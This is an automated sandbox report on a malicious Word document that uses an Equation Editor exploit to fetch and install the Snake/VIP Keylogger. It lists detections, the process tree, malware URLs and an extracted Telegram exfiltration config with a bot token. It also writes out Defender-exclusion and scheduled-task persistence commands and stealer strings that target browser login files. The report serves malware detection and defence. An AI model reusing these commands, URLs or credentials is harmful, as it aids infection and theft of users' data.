Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order072724.docx.doc

Overview

General Information

Sample name:order072724.docx.doc
Analysis ID:1483266
MD5:d89c00ac44e63c962db8c02cbf0bab93
SHA1:2ac1b269e93b1a0c0068b68d8d1d4f9e4a5cc06a
SHA256:5dc96311ffca3ae13e805020a61d276e2a2b1032e2ecc87a05f86c346e90d47c
Tags:doc
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 748 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • swagodi78811.scr (PID: 3468 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
        • powershell.exe (PID: 3544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3704 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • swagodi78811.scr (PID: 3864 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
        • swagodi78811.scr (PID: 3880 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
  • taskeng.exe (PID: 3888 cmdline: taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • gRpkBp.exe (PID: 4016 cmdline: C:\Users\user\AppData\Roaming\gRpkBp.exe MD5: C448536AEEA36B80A15D639E31C7B847)
      • powershell.exe (PID: 4084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3244 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • gRpkBp.exe (PID: 2060 cmdline: "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: C448536AEEA36B80A15D639E31C7B847)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7222270709:AAEe8p8C3uTJGMDBeQJ80Oh9drnBDJzIaE4", "Chat id": "-4219735485"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x4cbe0:$obj2: \objdata
  • 0x4cbfa:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x4cbe0:$obj2: \objdata
  • 0x4cbfa:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x482e:$a1: get_encryptedPassword
      • 0x4b5f:$a2: get_encryptedUsername
      • 0x463e:$a3: get_timePasswordChanged
      • 0x4747:$a4: get_passwordField
      • 0x4844:$a5: set_encryptedPassword
      • 0x5eeb:$a7: get_logins
      • 0x5e37:$a10: KeyLoggerEventArgs
      • 0x5a9c:$a11: KeyLoggerEventArgsEventHandler
      00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.swagodi78811.scr.316cb90.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            10.2.swagodi78811.scr.316cb90.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              10.2.swagodi78811.scr.316cb90.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                10.2.swagodi78811.scr.316cb90.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bc2e:$a1: get_encryptedPassword
                • 0x2bf5f:$a2: get_encryptedUsername
                • 0x2ba3e:$a3: get_timePasswordChanged
                • 0x2bb47:$a4: get_passwordField
                • 0x2bc44:$a5: set_encryptedPassword
                • 0x2d2eb:$a7: get_logins
                • 0x2d237:$a10: KeyLoggerEventArgs
                • 0x2ce9c:$a11: KeyLoggerEventArgsEventHandler
                10.2.swagodi78811.scr.316cb90.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39a63:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39106:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39363:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39d42:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 28 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.52.88, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3544, ProcessName: powershell.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\swagodi78811.scr, NewProcessName: C:\Users\user\AppData\Roaming\swagodi78811.scr, OriginalFileName: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3468, ProcessName: swagodi78811.scr
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3544, ProcessName: powershell.exe
                Sigma detected: SCR File Write Event
                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", ProcessId: 3704, ProcessName: schtasks.exe
                Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\swagodi78811.scr, QueryName: checkip.dyndns.org
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 748, Protocol: tcp, SourceIp: 104.21.52.88, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", ProcessId: 3704, ProcessName: schtasks.exe
                Sigma detected: Suspicious Screensaver Binary File Creation
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3544, ProcessName: powershell.exe
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3544, TargetFilename: C:\Users\user\AppData\Local\Temp\zanpl0wu.bwl.ps1

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", ProcessId: 3704, ProcessName: schtasks.exe

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-26T23:45:45.269177+0200
                SID:2803274
                Source Port:49187
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:46.595188+0200
                SID:2803274
                Source Port:49191
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:47.482045+0200
                SID:2803305
                Source Port:49193
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-07-26T23:45:43.939318+0200
                SID:2803305
                Source Port:49186
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-07-26T23:45:45.672752+0200
                SID:2803305
                Source Port:49189
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-07-26T23:45:47.219644+0200
                SID:2803305
                Source Port:49192
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-07-26T23:45:34.439640+0200
                SID:2803274
                Source Port:49171
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:38.046315+0200
                SID:2803274
                Source Port:49176
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:35.862446+0200
                SID:2803274
                Source Port:49174
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:30.886952+0200
                SID:2803274
                Source Port:49171
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:39.432931+0200
                SID:2803274
                Source Port:49177
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:39.278729+0200
                SID:2803274
                Source Port:49176
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:42.289531+0200
                SID:2803274
                Source Port:49182
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:41.727950+0200
                SID:2803274
                Source Port:49180
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:34.870932+0200
                SID:2803305
                Source Port:49173
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-07-26T23:45:40.927537+0200
                SID:2803274
                Source Port:49177
                Destination Port:80
                Protocol:TCP
                Classtype:Potentially Bad Traffic
                Timestamp:2024-07-26T23:45:21.214935+0200
                SID:2022053
                Source Port:443
                Destination Port:49168
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T23:45:39.742773+0200
                SID:2803305
                Source Port:49179
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://meridianresourcellc.top/swagodi.scrjAvira URL Cloud: Label: malware
                Source: https://meridianresourcellc.top/swagodi.scrsoC:Avira URL Cloud: Label: malware
                Source: https://meridianresourcellc.top/Avira URL Cloud: Label: malware
                Source: https://meridianresourcellc.top/swagodi.docAvira URL Cloud: Label: phishing
                Source: https://meridianresourcellc.top/swagodi.scrAvira URL Cloud: Label: malware
                Source: https://meridianresourcellc.top/swagodi.scrllC:Avira URL Cloud: Label: malware
                Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
                Found malware configuration
                Source: 10.2.swagodi78811.scr.316cb90.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7222270709:AAEe8p8C3uTJGMDBeQJ80Oh9drnBDJzIaE4", "Chat id": "-4219735485"}
                Multi AV Scanner detection for submitted file
                Source: order072724.docx.docReversingLabs: Detection: 42%
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scrJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.52.88 Port: 443Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scrJump to behavior
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.drStream path '_1783521069/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2
                Source: Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00421EF6h10_2_00422154
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_002069F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00209B83h20_2_00209A20
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 002095C1h20_2_00209300
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 002076B5h20_2_002074C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020803Fh20_2_002074C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_00207022
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020EB31h20_2_0020E830
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0020F461h20_2_0020F181
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_00207201
